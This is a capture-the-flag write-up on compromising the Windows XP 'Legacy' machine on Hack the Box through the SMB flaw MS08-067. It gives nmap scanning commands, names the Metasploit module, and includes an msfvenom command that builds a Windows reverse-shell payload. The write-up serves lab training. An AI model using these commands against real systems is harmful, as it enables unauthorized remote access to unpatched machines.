Legacy - Hack the Box (CTF)

A writeup about the Legacy Capture the Flag challenge on Hack the Box, an interesting box dealing with an old version of Windows.

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The Legacy machine from Hack the Box is a vulnerable machine that is designed to test penetration testing skills. This machine is based on a Windows XP operating system that has multiple vulnerabilities which can be exploited to gain access to the machine.


We start off this Capture the Flag challenge with doing what we always do, running our trusted threader3000 tool along with a proper nmap scan to map the machine and environment we’re dealing with.



nmap -p139,135,445 -sV -sC -T4 -Pn -oA


This highlights the following, interesting, ports on the target:


From the reconnaissance that we did it seems likely that the heavily outdated SMB port(s) are a good place to start digging. Windows XP has lost support, deeming it End-of-Life, meaning that no additional security patches or any other bug fixes are pushed through. With the introduction of newer versions of software, development teams often decide to stop continuing work on older versions of their product, which is also the case here.

Knowing that we’ll tackle a SMB share, similarly to the Blue machine from Hack the Box, we’ll run the NMAP scan that looks for vulnerabilities on SMB, this could prove useful and highlight any vulnerability that could be exploited.

nmap –script smb-vuln-* -p 139,445


As you can see from the above scan, it seems to be that the target machine is vulnerable to two different kind of vulnerabilities. The first one being MS17-010 which may sound familiar because it is, we used this exploit on the “Blue” machine of hack the box, exploiting the EternalBlue vulnerability.

The other vulnerability that has been picked up is MS08-067, also known as CVE-2008-4250. This vulnerability allows an attacker, in this case us, to execute arbitrary code via a crafted RPC request which will result in an overflow thus granting us access.

Exploitation 1

Now that it’s clear to us how we want to exploit the machine, it’s time to get to it. Just like every other writeup, we’ll tackle a Metasploit and non-Metasploit approach to compromise the machine. Let’s start of with the Metasploit approach.

The exploit is available as the “windows/smb/ms08_067_netapi” module. Filling out the important information like your IP, the port you want to listen on, the target IP and port, you’re ready to run the module as shown in the screenshot(s) below.



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Exploitation 2

For the second approach of exploiting the target, we’ll look at way that does not involve Metasploit. After some searching, I ran into the following exploit on Github created by Jivoi. For this exploit all you have to do is create your own shellcode and add that into the .py file. If you’re familiar with buffer overflows, this should be familiar to you but if not, to create the shellcode we’ll use msfvenom. This allows us to create all sorts of shellcode for all shorts of systems. In our case we want to create a basic reverse shell for our Windows target. We use this by executing the following command:

msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=1337 EXITFUNC=thread -b “\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40” -f py -v shellcode -a x86 –platform windows


With this shell code filled out and added into the exploit file, it is time to run the exploit. Running the exploit will immediately gives us the correct access that we need and we can repeat the steps we did previously during the Metasploit exploit.

Tips and Tricks

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